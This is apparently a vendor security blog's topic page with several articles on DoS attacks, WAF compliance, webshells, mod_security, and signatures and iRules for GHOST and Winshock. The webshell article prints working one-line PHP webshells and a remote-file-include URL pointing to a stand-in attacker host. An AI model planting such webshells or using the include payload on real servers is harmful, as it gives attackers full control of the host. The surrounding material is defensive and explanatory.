application security
80 TopicsLayer 4 vs Layer 7 DoS Attack
Not all DoS (Denial of Service) attacks are the same. While the end result is to consume as much - hopefully all - of a server or site's resources such that legitimate users are denied service (hence the name) there is a subtle difference in how these attacks are perpetrated that makes one easier to stop than the other. SYN Flood A Layer 4 DoS attack is often referred to as a SYN flood. It works at the transport protocol (TCP) layer. A TCP connection is established in what is known as a 3-way handshake. The client sends a SYN packet, the server responds with a SYN ACK, and the client responds to that with an ACK. After the "three-way handshake" is complete, the TCP connection is considered established. It is as this point that applications begin sending data using a Layer 7 or application layer protocol, such as HTTP. A SYN flood uses the inherent patience of the TCP stack to overwhelm a server by sending a flood of SYN packets and then ignoring the SYN ACKs returned by the server. This causes the server to use up resources waiting a configured amount of time for the anticipated ACK that should come from a legitimate client. Because web and application servers are limited in the number of concurrent TCP connections they can have open, if an attacker sends enough SYN packets to a server it can easily chew through the allowed number of TCP connections, thus preventing legitimate requests from being answered by the server. SYN floods are fairly easy for proxy-based application delivery and security products to detect. Because they proxy connections for the servers, and are generally hardware-based with a much higher TCP connection limit, the proxy-based solution can handle the high volume of connections without becoming overwhelmed. Because the proxy-based solution is usually terminating the TCP connection (i.e. it is the "endpoint" of the connection) it will not pass the connection to the server until it has completed the 3-way handshake. Thus, a SYN flood is stopped at the proxy and legitimate connections are passed on to the server with alacrity. The attackers are generally stopped from flooding the network through the use of SYN cookies. SYN cookies utilize cryptographic hashing and are therefore computationally expensive, making it desirable to allow a proxy/delivery solution with hardware accelerated cryptographic capabilities handle this type of security measure. Servers can implement SYN cookies, but the additional burden placed on the server alleviates much of the gains achieved by preventing SYN floods and often results in available, but unacceptably slow performing servers and sites. HTTP GET DoS A Layer 7 DoS attack is a different beast and it's more difficult to detect. A Layer 7 DoS attack is often perpetrated through the use of HTTP GET. This means that the 3-way TCP handshake has been completed, thus fooling devices and solutions which are only examining layer 4 and TCP communications. The attacker looks like a legitimate connection, and is therefore passed on to the web or application server. At that point the attacker begins requesting large numbers of files/objects using HTTP GET. They are generally legitimate requests, there are just a lot of them. So many, in fact, that the server quickly becomes focused on responding to those requests and has a hard time responding to new, legitimate requests. When rate-limiting was used to stop this type of attack, the bad guys moved to using a distributed system of bots (zombies) to ensure that the requests (attack) was coming from myriad IP addresses and was therefore not only more difficult to detect, but more difficult to stop. The attacker uses malware and trojans to deposit a bot on servers and clients, and then remotely includes them in his attack by instructing the bots to request a list of objects from a specific site or server. The attacker might not use bots, but instead might gather enough evil friends to launch an attack against a site that has annoyed them for some reason. Layer 7 DoS attacks are more difficult to detect because the TCP connection is valid and so are the requests. The trick is to realize when there are multiple clients requesting large numbers of objects at the same time and to recognize that it is, in fact, an attack. This is tricky because there may very well be legitimate requests mixed in with the attack, which means a "deny all" philosophy will result in the very situation the attackers are trying to force: a denial of service. Defending against Layer 7 DoS attacks usually involves some sort of rate-shaping algorithm that watches clients and ensures that they request no more than a configurable number of objects per time period, usually measured in seconds or minutes. If the client requests more than the configurable number, the client's IP address is blacklisted for a specified time period and subsequent requests are denied until the address has been freed from the blacklist. Because this can still affect legitimate users, layer 7 firewall (application firewall) vendors are working on ways to get smarter about stopping layer 7 DoS attacks without affecting legitimate clients. It is a subtle dance and requires a bit more understanding of the application and its flow, but if implemented correctly it can improve the ability of such devices to detect and prevent layer 7 DoS attacks from reaching web and application servers and taking a site down. The goal of deploying an application firewall or proxy-based application delivery solution is to ensure the fast and secure delivery of an application. By preventing both layer 4 and layer 7 DoS attacks, such solutions allow servers to continue serving up applications without a degradation in performance caused by dealing with layer 4 or layer 7 attacks.20KViews0likes3CommentsMaking WAF Simple: Introducing the OWASP Compliance Dashboard
Whether you are a beginner or an expert, there is a truth that I want to let you in on; building and maintaining Web Application Firewall (WAF) security policies can be challenging. How much security do you really need? Is your configuration too much or too little? Have you created an operational nightmare? Many well-intentioned administrators will initially enable every available feature, thinking that it is providing additional security to the application, when in truth, it is hindering it. How, you may ask? False positives and noise. The more noise and false positives, the harder it becomes to find the real attacks and the increased likelihood that you begin disabling features that ARE providing essential security for your applications. So… less is better then? That isn't the answer either, what good are our security solutions if they aren't protecting against anything? The key to success and what we will look at further in this article, is implementing best practice controls that are both measurable and manageable for your organization. The OWASP Application Security Top 10 is a well-respected list of the ten most prevalent and dangerous application layer attacks that you almost certainly should protect your applications from. By first focusing your security controls on the items in the OWASP Top 10, you are improving the manageability of your security solution and getting the most "bang for your buck". Now, the challenge is, how do you take such a list and build real security protections for your applications? Introducing the OWASP Compliance Dashboard Protecting your applications against the OWASP Top 10 is not a new thing, in fact, many organizations have been taking this approach for quite some time. The challenge is that most implementations that claim to "protect" against the OWASP Top 10 rely solely on signature-based protections for only a small subset of the list and provide zero insight into your compliance status. The OWASP Compliance Dashboard introduced in version 15.0 on BIG-IP Advanced WAF reinvents this idea by providing a holistic and interactive dashboard that clearly measures your compliancy against the OWASP Application Security Top 10. The Top 10 is then broken down into specific security protections including both positive and negative security controls that can be enabled, disabled, or ignored directly on the dashboard. We realize that a WAF policy alone may not provide complete protection across the OWASP Top 10, this is why the dashboard also includes the ability to review and track the compliancy of best practices outside the scope of a WAF alone, such as whether the application is subject to routine patching or vulnerability scanning. To illustrate this, let’s assume I have created a brand new WAF policy using the Rapid Deployment policy template and accepted all default settings, what compliance score do you think this policy might have? Let's take a look. Interesting. The policy is 0/10 compliant and only A2 Broken Authentication and A3 Sensitive Data Exposure have partial compliance. Why is that? The Rapid Deployment template should include some protections by default, shouldn't it? Expanding A1 Injection, we see a list of protections required in order to be marked as compliant. Hovering over the list of attack signatures, we see that each category of signature is in 'Staging' mode, aha! Signatures in staging mode are not enforced and therefore cannot block traffic. Until the signature set is in enforced, we do not mark that protection as compliant. For those of you who have mistakenly left entities such as Signatures in staging for longer than desired, this is also a GREAT way to quickly find them. I also told you we could also interact with the dashboard to influence the compliancy score, lets demonstrate that. Each item can be enforced DIRECTLY on the dashboard by selecting the "Enforce" checkmark on the right. No need to go into multiple menus, you can enforce all these security settings on a single page and preview the compliance status immediately. If you are happy with your selection, click on "Review & Update" to perform a final review of what the dashboard will be configuring on your behalf before you can click on "Save & Apply Policy". Note: Enforcing signatures before a period of staging may not be a good idea depending on your environment. Staging provides a period to assess signature matches in order to eliminate false positives. Enforcing these signatures too quickly could result in the denying of legitimate traffic. Let's review the compliancy of our policy now with these changes applied. As you can see, A1 Injection is now 100% compliant and other categories have also had their score updated as a result of enforcing these signatures. The reason for this is because there is overlap in the security controls applied acrossthese other categories. Not all security controls can be fully implemented directly via the dashboard, and as mentioned previously, not all security controls are signature-based. A6 Cross-Site Scripting was recalculated as 50% complaint with the signatures we enforced previously so let's take a look at what else it required for full compliancy. The options available to us are to IGNORE the requirement, meaning we will be granted full compliancy for that item without implementing any protection, or we can manually configure the protection referenced. We may want to ignore a protection if it is not applicable to the application or if it is not in scope for your deployment. Be mindful that ignoring an item means you are potentially misrepresenting the score of your policy, be very certain that the protection you are ignoring is in fact not applicable before doing so. I've selected to ignore the requirement for "Disallowed Meta Characters in Parameters" and my policy is now 100% compliance for A7 Cross-Site Scripting (XSS). Lastly, we will look at items within the dashboard that fall outside the scope of WAF protections. Under A9 Using Components with Known Vulnerabilities, we are presented with a series of best practices such as “Application and system hardening”, “Application and system patching” and “Vulnerability scanner integration”. Using the dashboard, you can click on the checkmark to the right for "Requirement fulfilled" to indicate that your organization implements these best practices. By doing so, the OWASP Compliance score updates, providing you with real-time visibility into the compliancy for your application. Conclusion The OWASP Compliance Dashboard on BIG-IP Advanced WAF is a perfect fit for the security administrator looking to fine-tune and measure either existing or new WAF policies against the OWASP App Security Top 10. The OWASP Compliance Dashboard not only tracks WAF-specific security protections but also includes general best practices, allowing you to use the dashboard as your one-stop-shop to measure the compliancy for ALL your applications. For many applications, protection against the OWASP Top 10 may be enough, as it provides you with best practices to follow without having to worry about which features to implement and where. Note: Keep in mind that some applications may require additional controls beyond the protections included in the OWASP Top 10 list. For teams heavily embracing automation and CI/CD pipelines, logging into a GUI to perform changes likely does not sound appealing. In that case, I suggest reading more about our Declarative Advanced WAF policy framework which can be used to represent the WAF policies in any CI/CD pipeline. Combine this with the OWASP Compliance Dashboard for an at-a-glance assessment of your policy and you have the best of both worlds. If you're not already using the OWASP Compliance Dashboard, what are you waiting for? Look out for Bill Brazill, Victor Granic and myself (Kyle McKay) on June 10th at F5 Agility 2020 where we will be presenting and facilitating a class called "Protecting against the OWASP Top 10". In this class, we will be showcasing the OWASP Compliance Dashboard on BIG-IP Advanced WAF further and providing ample hands-on time fine-tuning and measuring WAF policies for OWASP Compliance. Hope to see you there! To learn more, visit the links below. Links OWASP Compliance Dashboard: https://support.f5.com/csp/article/K52596282 OWASP Application Security Top 10: https://owasp.org/www-project-top-ten/ Agility 2020: https://www.f5.com/agility/attend7.5KViews8likes0CommentsWebshells
Webshells are web scripts (PHP/ASPX/etc.) that act as a control panel for the server running them. A webshell may be legitimately used by the administrator to perform actions on the server, such as: Create a user Restart a service Clean up disk space Read logs More… Therefore, a webshell simplifies server management for administrators that are not familiar with (or are less comfortable with) internal system commands using the console. However, webshells have bad connotations as well – they are a very popular post-exploitation tool that allow an attacker to gain full system control. Webshell Examples An example of a webshell may be as simple as the following script: <?php echo(system($_GET["q"])); ?> This script will read a user-provided value and pass it on to the underlying operating system as a shell command. For instance, issuing the following request will invoke the ‘ls’ command and print the result to the screen: http://example.com/webshell.php?q=ls An even simpler example for a webshell may be this: <?php eval($_GET["q"]); ?> This script will simply use the contents of the parameter “q” and evaluate it as pure PHP code. Example: http://example.com/webshell.php?q=echo%20("hello%20world")%3B From this point, the options are limitless. An attacker that uses a webshell on a compromised server effectively has full control over the application. If the web application is running under root – the attacker has full control over the entire web server as well. In many cases, the neighboring servers on the local network are at risk as well. How does a webshell attack work? We’ve now seen that a webshell script is a very powerful tool. However, a webshell is a “post-exploitation” tool – meaning an attacker first has to find a vulnerability in the web application, exploit it, and upload their webshell onto the server. One way to achieve this is by first uploading the webshell through a legitimate file upload page (for instance, a CV submission form on a company website) and then using an LFI (Local File Include) weakness in the application to include the webshell in one of the pages. A different approach may be an application vulnerable to arbitrary file write. An attacker may simply write the code to a new file on the server. Another example may be an RFI (Remote File Include) weakness in the application that effectively eliminates the need to upload the webshell on to the server. An attacker may host the webshell on a completely different server, and force the application to include it, like this: http://vulnerable.com/rfi.php?include=http://attacker.com/webshell.php The b374k webshell There are many and various implementations of webshells. As mentioned, those are not always meant to be used by attackers, but also by system administrators. Some of the “suspicious” webshells that are more popular with attackers are the following: c99 r57 c100 PHPjackal Locus In this article we will explore an open source webshell called b374k (https://github.com/b374k/b374k). From the readme: This PHP Shell is a useful tool for system or web administrator to do remote management without using cpanel, connecting using ssh, ftp etc. All actions take place within a web browser Features: File manager (view, edit, rename, delete, upload, download, archiver, etc) Search file, file content, folder (also using regex) Command execution More… Once we get the webshell up and running, we can view information and perform actions on the server. Listed below are a few use cases for this webshell that will demonstrate the power of webshells and how attackers can benefit from running them on a compromised web server: View process information and varied system information. Open a terminal and execute various commands, or open a code evaluator to run arbitrary code. Open a reverse shell on the server, to make sure access to the server is preserved. Issue outgoing HTTP requests from the server. Perform social engineering activities to broaden the scope of the attack. Mitigation using F5 ASM The F5 ASM module uses detection and prevention methods for each variation of this attack. For RFI (Remote File Include): ASM will detect any request that attempts to include an external URL, and prevent access. For Unrestricted File Upload + LFI (Local File Include): During upload or creation attempt of the webshell, ASM will detect the active code and prevent it from reaching the server. If the webshell is already on the server, ASM will detect when the application tries to reach the file using LFI and prevent access. If the webshell is already on the server and part of the application, ASM will detect when a suspicious page is requested, and prevent that page from being displayed.2.9KViews0likes4Comments4 reasons not to use mod-security
Apache is a great web server if for no other reason than it offers more flexibility through modules than just about any other web server. You can plug-in all sorts of modules to enhance the functionality of Apache. But as I often say, just because you can doesn't mean you should. One of the modules you can install is mod_security. If you aren't familiar with mod_security, essentially it's a "roll your own" web application firewall plug-in for the Apache web server. Some of the security functions you can implement via mod_security are: Simple filtering Regular Expression based filtering URL Encoding Validation Unicode Encoding Validation Auditing Null byte attack prevention Upload memory limits Server identity masking Built in Chroot support Using mod_security you can also implement protocol security, which is an excellent idea for ensuring that holes in protocols aren't exploited. If you aren't sold on protocol security you should read up on the recent DNS vulnerability discovered by Dan Kaminsky - it's all about the protocol and has nothing to do with vulnerabilities introduced by implementation. mod_security provides many options for validating URLs, URIs, and application data. You are, essentially, implementing a custom web application firewall using configuration directives. If you're on this path then you probably agree that a web application firewall is a good thing, so why would I caution against using mod_security? Well, there's four reasons, actually. It runs on every web server. This is an additional load on the servers that can be easily offloaded for a more efficient architecture. The need for partial duplication of configuration files across multiple machines can also result in the introduction of errors or extraneous configuration that is unnecessary. Running mod_security on every web server decreases capacity to serve users and applications accordingly, which may require additional servers to scale to meet demand. You have to become a security expert. You have to understand the attacks you are trying to stop in order to write a rule to prevent them. So either you become an expert or you trust a third-party to be the expert. The former takes time and that latter takes guts, as you're introducing unnecessary risk by trusting a third-party. You have to become a protocol expert. In addition to understanding all the attacks you're trying to prevent, you must become an expert in the HTTP protocol. Part of providing web application security is to sanitize and enforce the HTTP protocol to ensure it isn't abused to create a hole where none previously appeared. You also have to become an expert in Apache configuration directives, and the specific directives used to configure mod_security. The configuration must be done manually. Unless you're going to purchase a commercially supported version of mod_security, you're writing complex rules manually. You'll need to brush up on your regular expression skills if you're going to attempt this. Maintaining those rules is just as painful, as any update necessarily requires manual intervention. Of course you could introduce an additional instance of Apache with mod_security installed that essentially proxies all requests through mod_security, thus providing a centralized security architecture, but at that point you've just introduced a huge bottleneck into your infrastructure. If you're already load-balancing multiple instances of a web site or application, then it's not likely that a single instance of Apache with mod_security is going to be able to handle the volume of requests without increasing downtime or degrading performance such that applications might as well be down because they're too painful to use. Centralizing security can improve performance, reduce the potential avenues of risk through configuration error, and keeps your security up-to-date by providing easy access to updated signatures, patterns, and defenses against existing and emerging web application attacks. Some web application firewalls offer pre-configured templates for specific applications like Microsoft OWA, providing a simple configuration experience that belies the depth of security knowledge applied to protected the application. Web application firewalls can enable compliance with requirement 6.6 of PCI DSS. And they're built to scale, which means the scenario in which mod_security is used as a reverse proxy to protect all web servers from harm but quickly becomes a bottleneck and impediment to performance doesn't happen with purpose-built web application firewalls. If you're considering using mod_security then you already recognize the value of and need for a web application firewall. That's great. But consider carefully where you will deploy that web application firewall, because the decision will have an impact on the performance and availability of your site and applications.1.5KViews0likes7CommentsGHOST Vulnerability (CVE-2015-0235)
On 27 of January Qualys publisheda critical vulnerability dubbed “GHOST” as it can be triggered by the GetHOST functions ( gethostbyname*() ) of the glibc library shipping with the Linux kernel. Glibc is the main library of C language functionality and is present on most linux distributions. Those functions are used to get a corresponding structure out of a supplied hostname, while it also performs a DNS lookup if the hostname is a domain name and not an IP address. The vulnerable functions are obsolete however are still in use by many popular applications such as Apache, MySQL, Nginx and Node.js. Presently this vulnerability was proven to be remotely exploited for the Exim mail service only, while arbitrary code execution on any other system using those vulnerable functions is very context-dependent. Qualys mentioned through a security email list, the applications that were investigated but found to not contain the buffer overflow. Read more on the email list archive link below: http://seclists.org/oss-sec/2015/q1/283 Currently, F5 is not aware of any vulnerable web application, although PHP applications might be potentially vulnerable due to its “gethostbyname()” equivalent. UPDATE: WordPress content management system using xml-rpc ping back functionality was found to be vulnerable to the GHOST vulnerability. WordPress automatically notifies popular Update Services that you've updated your blog by sending aXML-RPCpingeach time you create or update a post. By sending a specially crafted hostname as paramter of xml-rpc ping back method the vulnerable Wordpress will return "500" HTTP response or no response at all after resulting in memory corruption. However, no exploitability was proven yet. Using ASM to Mitigate WordPress GHOST exploit As the crafted hostname should be around 1000 characters to trigger the vulnerability, limiting request size will mitigate the threat. Add the following user defined attack signature to detect and prevent potential exploitation of this specific vulnerability for WordPress systems. For version greater than 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; re2:"/https?://(?:.*?)?[\d\.]{500}/i"; For versions below 11.2.x: uricontent:"xmlrpc.php"; objonly; nocase; content:"methodcall"; nocase; pcre:"/https?://(?:.*?)?[\d\.]{500}/i"; This signature will catch any request to the "xmlrpc.php" URL which contains IPv4 format hostname greater than 500 characters. iRule Mitigation for Exim GHOST exploit At this time, only Exim mail servers are known to be exploitable remotely if configured to verify hosts after EHLO/HELO command in an SMTP session. If you run the Exim mail server behind a BigIP, the following iRule will detect and mitigate exploitation attempts: when CLIENT_ACCEPTED { TCP::collect } when CLIENT_DATA { if { ( [string toupper [TCP::payload]] starts_with "HELO " or [string toupper [TCP::payload]] starts_with "EHLO " ) and ( [TCP::payload length] > 1000 ) } { log local0. "Detected GHOST exploitation attempt" TCP::close } TCP::release TCP::collect } This iRule will catch any HELO/EHLO command greater than 1000 bytes. Create a new iRule and attach it to your virtual server.1.4KViews0likes7CommentsMitigating Winshock (CVE-2014-6321) Vulnerabilities Using BIG-IP iRules
Recently we’ve witnessed yet another earth shattering vulnerability in a popular and very fundamental service. Dubbed Winshock, it follows and joins the Heartbleed, Shellshock and Poodle in the pantheon of critical vulnerabilities discovered in 2014. Winshock (CVE-2014-6321) earns a 10.0 CVSS score due to being related to a common service such as TLS, and potentially allowing remote arbitrary code execution. SChannel From MSDN: Secure Channel, also known as Schannel, is a security support provider (SSP) that contains a set of security protocols that provide identity authentication and secure, private communication through encryption. Basically, SChannel is Microsoft’s implementation of TLS, and it is used in various MS-related services that support encryption and authentication – such as: Internet Information Services (IIS), Remote Desktop Protocol, Exchange and Outlook Web Access, SharePoint, Active Directory and more. Naturally, SChannel also contains implementation for the TLS handshake protocol, which is performed before every secure session is established between the client and the server. The TLS Handshake The following image demonstrates how a typical TLS handshake looks like: Image source: http://www-01.ibm.com/support/knowledgecenter/SSFKSJ_7.1.0/com.ibm.mq.doc/sy10660_.htm?lang=en The handshake is used for the client and the server to agree on the terms of the connection. The handshake is conducted using messages, for the purpose of authenticating between the server and the client, agreeing on cipher suites, and exchanging public keys using certificates. Each type of message is passed on the wire as a unique “TLS Record”. Several messages (TLS records) may be sent over one packet. Some of the known TLS records are the following: Client Hello – The client announces it would like to initiate a connection with the server. It also presents all the various cipher suites it can support. This record may also have numerous extensions used to provide even more data. Server Hello – The server acknowledges the Client Hello and presents its own information. Certificate Request – In some scenarios, the client is required to present its certificate in order to authenticate itself. This is known as two-way authentication (or a mutual authentication). The Certificate Request message is sent by the server and forces the client to present a valid certificate before the handshake is successful. Certificate – A message used to transfer the contents of a certificate, including subject name, issuer, public key and more. Certificate Verify – Contains signed value using the client’s private key. It is presented by the client along with their certificate during a 2-way handshake, and serves as a proof of the client actually holding the certificate they claim to. SChannel Vulnerabilities Two vulnerabilities were found in the way SChannel handles those TLS records. One vulnerability occurs when parsing the “server_name” extension of the Client Hello message. This extension is typically used to specify the host name which the client is trying to connect to on the target server. In some way this is similar to the HTTP “Host” header. It was found that SChannel will not properly manage memory allocation when this record contains more than one server name. This vulnerability leads to denial of service by memory exhaustion. The other vulnerability occurs when an invalid signed value is presented inside a Certificate Verify message. It was found that values larger than what the server expects will be written to the memory beyond the allocated buffer scope. This behavior may result in a potential remote code execution. Mitigationwith BIG-IP iRules SSL offloading using BIG-IP is inherently not vulnerable as it does not relay vulnerable messages to the backend server. However, in a “pass-through” scenario, where all the TLS handshake messages are being forwarded without inspection, backend servers may be vulnerable to these attacks. The following iRule will detect and mitigate attempts to exploit above SChannel vulnerabilities: when CLIENT_ACCEPTED { TCP::collect set MAX_TLS_RECORDS 16 set iPacketCounter 0 set iRecordPointer 0 set sPrimeCurve "" set iMessageLength 0 } when CLIENT_DATA { #log local0. "New TCP packet. Length [TCP::payload length]. Packet Counter $iPacketCounter" set bScanTLSRecords 0 if { $iPacketCounter == 0 } { binary scan [TCP::payload] cSS tls_xacttype tls_version tls_recordlen if { [info exists tls_xacttype] && [info exists tls_version] && [info exists tls_recordlen] } { if { ($tls_version == "769" || $tls_version == "770" || $tls_version == "771") && $tls_xacttype == 22 } { set bScanTLSRecords 1 } } } if { $iPacketCounter > 0 } { # Got here mid record, collect more fragments #log local0. "Gather. tls rec $tls_recordlen, ptr $iRecordPointer" if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } { #log local0. "Full record received" set bScanTLSRecords 1 } else { #log local0. "Record STILL fragmented" set iPacketCounter [expr {$iPacketCounter + 1}] TCP::collect } } if { $bScanTLSRecords } { # Start scanning records set bNextRecord 1 set bKill 0 while { $bNextRecord >= 1 } { #log local0. "Reading next record. ptr $iRecordPointer" binary scan [TCP::payload] @${iRecordPointer}cSS tls_xacttype tls_version tls_recordlen #log local0. "SSL Record Type $tls_xacttype , Version: $tls_version , Record Length: $tls_recordlen" if { [expr {$iRecordPointer + $tls_recordlen + 5}] <= [TCP::payload length] } { binary scan [TCP::payload] @[expr {$iRecordPointer + 5}]c tls_action if { $tls_xacttype == 22 && $tls_action == 1 } { #log local0. "Client Hello" set iRecordOffset [expr {$iRecordPointer + 43}] binary scan [TCP::payload] @${iRecordOffset}c tls_sessidlen set iRecordOffset [expr {$iRecordOffset + 1 + $tls_sessidlen}] binary scan [TCP::payload] @${iRecordOffset}S tls_ciphlen set iRecordOffset [expr {$iRecordOffset + 2 + $tls_ciphlen}] binary scan [TCP::payload] @${iRecordOffset}c tls_complen set iRecordOffset [expr {$iRecordOffset + 1 + $tls_complen}] binary scan [TCP::payload] @${iRecordOffset}S tls_extenlen set iRecordOffset [expr {$iRecordOffset + 2}] binary scan [TCP::payload] @${iRecordOffset}a* tls_extensions for { set i 0 } { $i < $tls_extenlen } { incr i 4 } { set iExtensionOffset [expr {$i}] binary scan $tls_extensions @${iExtensionOffset}SS etype elen if { ($etype == "00") } { set iScanStart [expr {$iExtensionOffset + 9}] set iScanLength [expr {$elen - 5}] binary scan $tls_extensions @${iScanStart}A${iScanLength} tls_servername if { [regexp \x00 $tls_servername] } { log local0. "Winshock detected - NULL character in host name. Server Name: $tls_servername" set bKill 1 } else { #log local0. "Server Name found valid: $tls_servername" } set iExtensionOffset [expr {$iExtensionOffset + $elen}] } else { #log local0. "Uninteresting extension $etype" set iExtensionOffset [expr {$iExtensionOffset + $elen}] } set i $iExtensionOffset } } elseif { $tls_xacttype == 22 && $tls_action == 11 } { #log local0. "Certificate" set iScanStart [expr {$iRecordPointer + 17}] set iScanLength [expr {$tls_recordlen - 12}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_certificate if { [regexp {\x30\x59\x30\x13\x06\x07\x2a\x86\x48\xce\x3d\x02\x01(\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07|\x06\x05\x2b\x81\x04\x00(?:\x22|\x23))} $client_certificate reMatchAll reMatch01] } { #log local0. $match01 switch $reMatch01 { "\x06\x08\x2a\x86\x48\xce\x3d\x03\x01\x07" { set sPrimeCurve "P-256" } "\x06\x05\x2b\x81\x04\x00\x22" { set sPrimeCurve "P-384" } "\x06\x05\x2b\x81\x04\x00\x23" { set sPrimeCurve "P-521" } default { #log local0. "Invalid curve" } } } } elseif { $tls_xacttype == 22 && $tls_action == 15 } { #log local0. "Certificate Verify" set iScanStart [expr {$iRecordPointer + 11}] set iScanLength [expr {$tls_recordlen - 6}] binary scan [TCP::payload] @${iScanStart}A${iScanLength} client_signature binary scan $client_signature c cSignatureHeader if { $cSignatureHeader == 48 } { binary scan $client_signature @3c r_len set s_len_offset [expr {$r_len + 5}] binary scan $client_signature @${s_len_offset}c s_len set iMessageLength $r_len if { $iMessageLength < $s_len } { set iMessageLength $s_len } } else { #log local0. "Sig header invalid" } } else { #log local0. "Uninteresting TLS action" } # Curve and length found - check Winshock if { $sPrimeCurve ne "" && $iMessageLength > 0 } { set iMaxLength 0 switch $sPrimeCurve { "P-256" { set $iMaxLength 33 } "P-384" { set $iMaxLength 49 } "P-521" { set $iMaxLength 66 } } if { $iMessageLength > $iMaxLength } { log local0. "Winshock detected - Invalid message length (found: $iMessageLength, max:$iMaxLength)" set bKill 1 } } # Exploit found, close connection if { $bKill } { TCP::close set bNextRecord 0 } else { # Next record set iRecordPointer [expr {$iRecordPointer + $tls_recordlen + 5}] if { $iRecordPointer == [TCP::payload length]} { # End of records => Assume it is the end of the packet. #log local0. "End of records" set bNextRecord 0 set iPacketCounter 0 set iRecordPointer 0 set sPrimeCurve "" set iMessageLength 0 TCP::release TCP::collect } else { if { $bNextRecord < $MAX_TLS_RECORDS } { set bNextRecord [expr {$bNextRecord + 1}] } else { set bNextRecord 0 #log local0. "Too many loops over TLS records, exit now" TCP::release TCP::collect } } } } else { #log local0. "Record fragmented" set bNextRecord 0 set iPacketCounter [expr {$iPacketCounter + 1}] TCP::collect } } } else { # Exit here if packet is not TLS handshake if { $iPacketCounter == 0 } { TCP::release TCP::collect } } } Create a new iRule and attach it to your virtual server.1.2KViews0likes13CommentsBeware Using Internal Encryption as an IT Security Blanket
It certainly sounds reasonable: networks are moving toward a perimeter-less model so the line between internal and external network is blurring. The introduction of cloud computing as overdraft protection (cloud-bursting) further blurs that perimeter such that it’s more a suggestion than a rule. That makes the idea of encrypting everything whether it’s on the internal or external network seem to be a reasonable one. Or does it? THE IMPACT ON OPERATIONS A recent post posits that PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing. The arguments are valid, but there is a catch (there’s always a catch). Consider this nugget from the article: Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. In addition, layer 2 security features should be enabled on the access switches carrying said data. Be sure to unencrypt your data streams before sending them to IPS, DLP, and other deep packet inspection devices. This is easy to say but in many cases harder to implement in practice. If you run into any issues feel free to post them here. I realize this is a controversial topic for security geeks (like myself) but given recent PCI breaches that took advantage of the above weaknesses, I have to error on the side of security. Sure more security doesn’t always mean better security, but smarter security always equals better security, which I believe is the case here. [emphasis added] It is the reminder to decrypt data streams before sending them to IPS, DLP, and other “deep packet inspection devices” that brings to light one of the issues with such a decision: complexity of operations and management. It isn’t just the additional latency inherent in the decryption of secured data streams required for a large number of the devices in an architecture to perform their tasks that’s the problem, though that is certainly a concern. The larger problem is the operational inefficiency that comes from the decryption of secured data at multiple points in the architecture. See there’s this little thing called “keys” that have to be shared with every device in the data center that will decrypt data, and that means managing each of those key stores in their own right. Keys are the, well, key to the kingdom of data encryption and if they are lost or stolen it can be disastrous to the security of all affected systems and applications. By better securing data in flight through encryption of all data on the internal network an additional layer of insecurity is introduced that must be managed. But let’s pretend this additional security issue doesn’t exist, that all systems on which these keys are stored are secure (ha!). Operations must still (a) configure every inline device to decrypt and re-encrypt the data stream and (b) manage the keys/certificates on every inline device. That’s in addition to managing the keys/certificates on every endpoint for which data is destined. There’s also the possibility that intermediate devices for which data will be decrypted before receiving – often implemented using spanned/mirrored ports on a switch/router – will require a re-architecting of the network in order to implement such an architecture. Not only must each device be configured to decrypt and re-encrypt data streams, it must be configured to do so for every application that utilizes encryption on the internal network. For an organization with only one or two applications this might not be so onerous a task, but for organizations that may be using multiple applications, domains, and thus keys/certificates, the task of deploying all those keys/certificates and configuring each device and then managing them through the application lifecycle can certainly be a time-consuming process. This isn’t a linear mathematics problem, it’s exponential. For every key or certificate added the cost of managing that information increases by the number of devices that must be in possession of that key/certificate. INTERNAL ENCRYPTION CAN HIDE REAL SECURITY ISSUES The real problem, as evinced by recent breaches of payment card processing vendors like Heartland Systems is not that data was or was not encrypted on the internal network, but that the systems through which that data was flowing were not secured. Attackers gained access through the systems, the ones we are pretending are secure for the sake of argument. Obviously, pretending they are secure is not a wise course of action. One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. This is a very important point so let me say it again: One cannot capture and sniff out unsecured data on an internal network without first being on the internal network. It would seem, then, that the larger issue here is the security of the systems and devices through which sensitive data must travel and that encryption is really just a means of last resort for data traversing the internal network. Internal encryption is often a band-aid which often merely covers up the real problem of insecure systems and poorly implemented security policies. Granted, in many industries internal encryption is a requirement and must be utilized, but those industries also accept and grant IT the understanding that costs will be higher in order to implement such an architecture. The additional costs are built into the business model already. That’s not necessarily true for most organizations where operational efficiency is now just as high a priority as any other IT initiative. The implementation of encryption on internal networks can also lead to a false sense of security. It is important to remember that encrypted tainted data is still tainted data; it is merely hidden from security systems which are passive in nature unless the network is architected (or re-architected) such that the data is decrypted before being channeled through the solutions. Encryption hides data from prying eyes, it does nothing to ensure the legitimacy of the data. Simply initiating a policy of “all data on all networks must be secured via encryption” does not make an organization more secure and in fact it may lead to a less secure organization as it becomes more difficult and costly to implement security solutions designed to dig deeper into the data and ensure it is legitimate traffic free of taint or malicious intent. Bottom line is everyone with confidential data to protect should enable encryption on all internal networks with access to that data. The “bottom line” is everyone with confidential data to protect – which is just about every IT organization out there – needs to understand the ramifications of enabling encryption across the internal network both technically and from a cost/management perspective. Encryption of data on internal networks is not a bad thing to do at all but it is also not a panacea. The benefits of implementing internal encryption need to be weighed against the costs and balanced with risk and not simply tossed blithely over the network like a security blanket. PCI Standard or Not, Encrypting Internal Network Traffic is a Good Thing The Real Meaning of Cloud Security Revealed The Unpossible Task of Eliminating Risk Damned if you do, damned if you don't The IT Security Flowchart802Views0likes1CommentMitigating the Unknown
